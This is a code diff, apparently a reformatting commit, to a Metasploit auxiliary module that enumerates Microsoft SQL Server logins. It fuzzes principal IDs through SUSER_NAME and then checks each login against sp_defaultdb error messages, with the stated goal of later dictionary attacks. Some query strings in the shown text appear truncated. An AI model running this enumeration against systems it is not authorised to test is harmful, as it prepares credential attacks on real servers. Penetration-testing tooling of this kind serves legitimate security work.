@@ -12,20 +12,20 @@ class Metasploit3 < Msf::Auxiliary
1212
1313 def initialize ( info = { } )
1414 super ( update_info ( info ,
15- 'Name' => 'Microsoft SQL Server - Enumerate SQL Logins' ,
16- 'Description' => %q{
17- This module can be used to obtain a list of all logins from a SQL Server with any
18- login. Selecting all of the logins from the master..syslogins table is restricted
19- to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate
20- all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter.
21- This is pretty simple, because the principal ids assigned to logins are incremental. Once
22- logins have been enumerated they can be verified via sp_defaultdb error analysis.
23- This is important, because not all of the principal ids resolve to SQL logins. Some resolve
24- to roles etc. Once logins have been enumerated they can be used in dictionary attacks.
15+ 'Name' => 'Microsoft SQL Server - Enumerate SQL Logins' ,
16+ 'Description' => %q{
17+ This module can be used to obtain a list of all logins from a SQL Server with any login.
18+ Selecting all of the logins from the master..syslogins table is restricted to sysadmins.
19+ However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server
20+ logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is
21+ pretty simple, because the principal ids assigned to logins are incremental. Once logins
22+ have been enumerated they can be verified via sp_defaultdb error analysis. This is
23+ important, because not all of the principal ids resolve to SQL logins. Some resolve to
24+ roles etc. Once logins have been enumerated they can be used in dictionary attacks.
2525 } ,
26- 'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ] ,
27- 'License' => MSF_LICENSE ,
28- 'References' => [ [ 'URL' , 'http://msdn.microsoft.com/en-us/library/ms174427.aspx' ] ]
26+ 'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>' ] ,
27+ 'License' => MSF_LICENSE ,
28+ 'References' => [ [ 'URL' , 'http://msdn.microsoft.com/en-us/library/ms174427.aspx' ] ]
2929 ) )
3030
3131 register_options (
@@ -113,30 +113,27 @@ def check_sysadmin
113113
114114 # Gets trusted databases owned by sysadmins
115115 def get_sql_logins
116-
117116 # Create array to store the sql logins
118117 sql_logins = [ ]
119118
120119 # Fuzz the principal_id parameter passed to the SUSER_NAME function
121120 ( 1 ..datastore [ 'FuzzNum' ] ) . each do |principal_id |
121+ # Setup query
122+ sql = "SELECT SUSER_NAME(#{ principal_id }
122123
123- # Setup query
124- sql = "SELECT SUSER_NAME(#{ principal_id }
125-
126- # Execute query
127- result = mssql_query ( sql )
124+ # Execute query
125+ result = mssql_query ( sql )
128126
129- # Parse results
130- parse_results = result [ :rows ]
131- sql_login = parse_results [ 0 ] [ 0 ]
127+ # Parse results
128+ parse_results = result [ :rows ]
129+ sql_login = parse_results [ 0 ] [ 0 ]
132130
133- # Add to sql server login list
134- sql_logins . push ( sql_login ) unless sql_logins . include? ( sql_login )
131+ # Add to sql server login list
132+ sql_logins . push ( sql_login ) unless sql_logins . include? ( sql_login )
135133 end
136134
137135 # Return list of logins
138136 sql_logins
139-
140137 end
141138
142139 # Checks if user has the db_owner role
@@ -147,7 +144,6 @@ def verify_logins(sql_logins_list)
147144
148145 # Check if the user has the db_owner role is any databases
149146 sql_logins_list . each do |sql_login |
150-
151147 # Setup query
152148 sql = "EXEC sp_defaultdb '#{ sql_login }
153149
@@ -165,11 +161,11 @@ def verify_logins(sql_logins_list)
165161
166162 # Check if sid resolved to a sql login
167163 if result . include? 'alter the login'
168-
169164 # Add sql server login to verified list
170165 verified_sql_logins . push ( sql_login ) unless verified_sql_logins . include? ( sql_login )
171166 end
172167 end
168+
173169 verified_sql_logins
174170 end
175171end
0 commit comments